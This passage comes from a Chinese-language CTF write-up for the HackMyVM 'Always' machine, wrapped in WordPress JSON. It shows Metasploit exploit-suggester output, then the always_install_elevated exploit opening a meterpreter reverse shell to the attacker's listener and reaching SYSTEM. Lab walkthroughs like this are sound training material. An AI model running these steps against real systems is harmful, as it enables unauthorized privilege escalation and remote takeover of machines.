validated.\n[+] 172.20.10.3 - exploit\/windows\/local\/ms16_014_wmi_recv_notif: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/tokenmagic: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/virtual_box_opengl_escape: The service is running, but could not be validated.\n[*] Running check method for exploit 45 \/ 45\n[*] 172.20.10.3 - Valid modules for session 1:\n============================\n\n #   Name                                                           Potentially Vulnerable?  Check Result\n -   ----                                                           -----------------------  ------------\n 1   exploit\/windows\/local\/always_install_elevated                  Yes                      The target is vulnerable.\n 2   exploit\/windows\/local\/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.\n 3   exploit\/windows\/local\/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.\n 4   exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n 5   exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe             Yes                      The target appears to be vulnerable.\n 6   exploit\/windows\/local\/cve_2021_40449                           Yes                      The service is running, but could not be validated. Windows 7\/Windows Server 2008 R2 build detected!\n 7   exploit\/windows\/local\/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.\n 8   exploit\/windows\/local\/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.\n 9   exploit\/windows\/local\/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.\n 10  exploit\/windows\/local\/ms15_078_atmfd_bof                       Yes                      The service is running, but could not be validated.\n 11  exploit\/windows\/local\/ms16_014_wmi_recv_notif                  Yes                      The target appears to be vulnerable.\n 12  exploit\/windows\/local\/tokenmagic                               Yes                      The target appears to be vulnerable.\n 13  exploit\/windows\/local\/virtual_box_opengl_escape                Yes                      The service is running, but could not be validated.\n 14  exploit\/windows\/local\/agnitum_outpost_acs                      No                       The target is not exploitable.\n 15  exploit\/windows\/local\/bits_ntlm_token_impersonation            No                       The target is not exploitable.\n 16  exploit\/windows\/local\/bypassuac_dotnet_profiler                No                       The target is not exploitable.\n 17  exploit\/windows\/local\/bypassuac_fodhelper                      No                       The target is not exploitable.\n 18  exploit\/windows\/local\/bypassuac_sdclt                          No                       The target is not exploitable.\n 19  exploit\/windows\/local\/bypassuac_sluihijack                     No                       The target is not exploitable.\n 20  exploit\/windows\/local\/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found\n 21  exploit\/windows\/local\/capcom_sys_exec                          No                       The target is not exploitable.\n 22  exploit\/windows\/local\/cve_2020_0796_smbghost                   No                       The target is not exploitable.\n 23  exploit\/windows\/local\/cve_2020_1048_printerdemon               No                       The target is not exploitable.\n 24  exploit\/windows\/local\/cve_2020_1313_system_orchestrator        No                       The target is not exploitable.\n 25  exploit\/windows\/local\/cve_2020_1337_printerdemon               No                       The target is not exploitable.\n 26  exploit\/windows\/local\/cve_2020_17136                           No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!\n 27  exploit\/windows\/local\/cve_2021_21551_dbutil_memmove            No                       The target is not exploitable.\n 28  exploit\/windows\/local\/cve_2022_21882_win32k                    No                       The target is not exploitable.\n 29  exploit\/windows\/local\/cve_2022_21999_spoolfool_privesc         No                       The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot. 30  exploit\/windows\/local\/cve_2022_3699_lenovo_diagnostics_driver  No                       The target is not exploitable.\n 31  exploit\/windows\/local\/cve_2023_21768_afd_lpe                   No                       The target is not exploitable. The exploit only supports Windows 11 22H2\n 32  exploit\/windows\/local\/cve_2023_28252_clfs_driver               No                       The target is not exploitable. The target system does not have clfs.sys in system32\\drivers\\\n 33  exploit\/windows\/local\/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found\n 34  exploit\/windows\/local\/ikeext_service                           No                       The check raised an exception.\n 35  exploit\/windows\/local\/lexmark_driver_privesc                   No                       The target is not exploitable. No Lexmark print drivers in the driver store\n 36  exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc  No                       The target is not exploitable.\n 37  exploit\/windows\/local\/ms16_075_reflection                      No                       The target is not exploitable.\n 38  exploit\/windows\/local\/ms16_075_reflection_juicy                No                       The target is not exploitable.\n 39  exploit\/windows\/local\/ntapphelpcachecontrol                    No                       The check raised an exception.\n 40  exploit\/windows\/local\/nvidia_nvsvc                             No                       The check raised an exception.\n 41  exploit\/windows\/local\/panda_psevents                           No                       The target is not exploitable.\n 42  exploit\/windows\/local\/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found\n 43  exploit\/windows\/local\/srclient_dll_hijacking                   No                       The target is not exploitable. Target is not Windows Server 2012.\n 44  exploit\/windows\/local\/webexec                                  No                       The check raised an exception.\n 45  exploit\/windows\/local\/win_error_cve_2023_36874                 No                       The target is not exploitable.<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">[*] Post module execution completed\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; use 1\nmsf6 post(osx\/manage\/sonic_pi) &gt; use exploit\/windows\/local\/always_install_elevated\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\nmsf6 exploit(windows\/local\/always_install_elevated) &gt; options\n\nModule options (exploit\/windows\/local\/always_install_elevated):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   SESSION                   yes       The session to run this module on\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  process          yes       Exit technique (Accepted: &#039;&#039;, seh, thread, process, none)\n   LHOST     10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Windows\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(windows\/local\/always_install_elevated) &gt; set SESSION 1\nSESSION =&gt; 1\nmsf6 exploit(windows\/local\/always_install_elevated) &gt; set lhost 172.20.10.8 \nlhost =&gt; 172.20.10.8\nmsf6 exploit(windows\/local\/always_install_elevated) &gt; run\n\n[*] Started reverse TCP handler on 172.20.10.8:4444 \n[*] Uploading the MSI to C:\\Users\\FTPUSE~1.ALW\\AppData\\Local\\Temp\\jiCwTOfrMvJ.msi ...\n[*] Executing MSI...\n[*] Sending stage (176198 bytes) to 172.20.10.3\n[+] Deleted C:\\Users\\FTPUSE~1.ALW\\AppData\\Local\\Temp\\jiCwTOfrMvJ.msi\n[*] Meterpreter session 2 opened (172.20.10.8:4444 -&gt; 172.20.10.3:49446) at 2024-12-22 08:31:25 -0500\n\nmeterpreter &gt; shell\nProcess 2668 created.\nChannel 2 created.\nMicrosoft Windows [S\ufffdr\ufffdm 6.1.7601]\nTelif Hakk\ufffd (c) 2009 Microsoft Corporation. T\ufffdm haklar\ufffd sakl\ufffdd\ufffdr.\n\nC:\\Windows\\system32&gt;whoami\nwhoami\nnt authority\\system<\/code><\/pre>\n<p>\u5df2\u7ecf\u62ff\u5230root\u4e86\uff0c\u63a5\u4e0b\u6765\u6b63\u5e38\u627eflag\u5c31\u884c\u4e86\uff0c\u8981\u6709\u8010\u5fc3\uff01<\/p>\n<pre><code class=\"language-bash\">HMV{You_Found_Me!}  \nHMV{White_Flag_Raised}<\/code><\/pre>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/gaznetsystems.com\/Hackmyvm\/Easy\/Always\">https:\/\/gaznetsystems.com\/Hackmyvm\/Easy\/Always<\/a><\/p>\n<p><a href=\"https:\/\/medium.com\/@josemlwdf\/always-2fe441d13d50\">https:\/\/medium.com\/@josemlwdf\/always-2fe441d13d50<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Always \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-823","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/823","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=823"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/823\/revisions"}],"predecessor-version":[{"id":824,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/823\/revisions\/824"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=823"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=823"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=823"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}